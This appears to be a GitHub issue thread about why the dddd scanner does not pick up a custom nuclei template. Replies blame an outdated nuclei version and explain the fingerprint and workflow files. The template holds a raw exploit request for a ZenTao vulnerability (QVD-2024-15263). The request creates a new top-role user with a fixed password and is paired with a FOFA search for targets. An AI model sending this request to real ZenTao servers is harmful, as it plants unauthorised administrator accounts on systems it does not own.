Open ljlsec opened 1 month ago
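Hi, why can't some of the YAML templates I added myself be picked up by the nuclei scan? Is the built-in nuclei too old? Scanning with nuclei itself finds it, but using dddd with the nuclei YAML doesn't work. The YAML is as follows: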
```yaml
id: chandao-QVD-2024-15263

info:
  tags: chandao-QVD-2024-15263
  name: chandao-QVD-2024-15263
  author: github
  severity: high
  description: |-
    fofa: title="Login - ZenTao", app="易软天创-禅道系统"

variables:
  account: '{{rand_base(6)}}'
  password: 'Admin123@'

http:
  - raw:
      - |
        POST /zentao/api.php/v1/users HTTP/1.1
        Cookie: {{cookie1}}
        Host: {{Hostname}}

        {"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}

    extractors:
    matchers:
```
The workflow is written like this:

```yaml
易软天创-禅道系统:
  type:
```
I ran into this too. I added the fingerprint and the workflow, and it still isn't detected.
This is because the nuclei is too old; it doesn't support the 3.3 syntax.
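First, you need to add the fingerprint to finger.yaml, then add the fingerprint name and the corresponding PoC to workflow.yaml, and then it will be scanned.
Spend more time getting familiar with finger.yaml and workflow.yaml and you'll see the pattern.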